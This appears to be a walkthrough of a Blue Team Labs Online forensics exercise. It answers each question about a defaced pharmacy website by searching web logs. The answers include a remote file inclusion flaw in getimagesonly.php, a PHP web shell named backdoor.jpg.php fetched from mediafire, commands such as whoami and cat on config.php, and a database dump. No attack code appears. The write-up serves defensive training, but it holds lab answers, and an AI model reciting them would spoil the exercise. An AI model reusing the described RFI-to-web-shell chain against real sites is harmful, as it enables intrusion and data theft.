Scenario
Mike is a young entrepreneur that recently started a pharmaceutical company online that supplies personal health products. As the business is growing at a rapid pace, Mike pressured the developers to create a website as quickly as possible and disregarded time-consuming security measures. Unsurprisingly, after the website went live it was defaced by a threat actor that also stole all the database records.
What is the signature left by the threat actor that compromised the website?
First things first, let’s get to know some deeper scenario details and get familiar with what we’re working on by reading the Scenario.txt on the desktop, and then look into the files in Investigation Files directory, also on the desktop.
Opening the After.JPG image file we can easily find the answer to the first question, which is Team ApashKirikiri2.0.
The attacker deleted some files. What are they?
If you read the scenario details you’ll know that you’re also provided two screenshots from the file integrity monitoring software, so the answer of access_log, error_log can be found in one of those screenshots in the Investigation Files directory.
What is the scanner used by the attacker to identify the vulnerability?
Not going to lie, this one had me stumped for quite a while, and judging from the BLTO Discord server I was far from the only one. Generally you’d start by looking at user agent strings in the log files, but in this case none can be found - at all.
Ultimately I just ended up figuring out which enumeration tools exist and could possibly have been used here, and ended up with the correct answer being nikto. This can be confirmed with log analysis as there are some hits that do in fact identify nikto, but I still feel that it was a bit more about luck instead of skill.
Which PHP page is vulnerable to Remote File Inclusion (RFI)?
Since we know we’re looking for a PHP file as well as a functioning reply we can use the search argument “response: 200 AND request: *.php”* to limit our search to successful responses to PHP file requests, and that way we can quickly see that the answer to this question is getimagesonly.php due to the way the HTTP request is formatted.
What is the IP address of the remote attacker?
This basically builds on the last question, as since we know that RFI was utilized we can also make an educated guess that the IP address in that request is the correct answer, and it is. So 91.192.103.35 is the right answer here.
Alternatively we could filter by clientip to see how many requests each specific IP address have made, and seeing this one being hands down the most active it would definitely warrant a closer look at it.
What is the name of the PHP shell?
Yet another PHP file to be looked up, so just looking up php files that have ? afterwards we’re able to filter out those that are likely to be the shell, and in fact we do find a file named backdoor.jpg.php which has been used to run multiple commands, so we’ve found our suspect.
The attacker downloaded the PHP shell from a file-hosting website. What is the name of the website?
Since we now know the filename of the PHP shell we can also look up the origin of it by just searching for backdoor.jpg.php, and in addition to the file being used on the infected server we can find a mediafire.com download link which was used via the vulnerable getimagesonly.php file we found previously. We can also see another file called webshell.php pulled, but it was not used.
What time was the first command executed through the PHP shell?
Looking up the usage of the backdoor.jpg.php file we can easily find the commands that were run using it, and we can see when they were run. Do note that the time in the original syslog file and the time shown in the UI are not the same, and the ones asked for by BTLO are the syslog times.
Long story short, the first command run was whoami and it was run at 18/02/2021 17:12:44.
Which config file does the attacker attempt to read using the command ‘cat’?
Here we can either just keep on digging through the listings we get for our search filter using the backdoor file, or we can make a guess that the config file is named configsomething, either one works and we’ll end up finding the answer to this question: /opt/lampp/htdocs/MikePharmaSystem/config.php.
At what time was the database dumped by the attacker?
Akin to the previous question we can make a guess that database export would somewhere in the message string have the letters db, and sure enough that is correct. Finding the log entry concerning db_export.php and using the syslog timestamp of 18/02/2021 17:14:59 we have our answer.
The attacker exfiltrated the database records. What is the database name?
Having found the database export log entry we can also find the database name in that message, so entering Mike_Pharmaceuticals clears the final question and this exercise.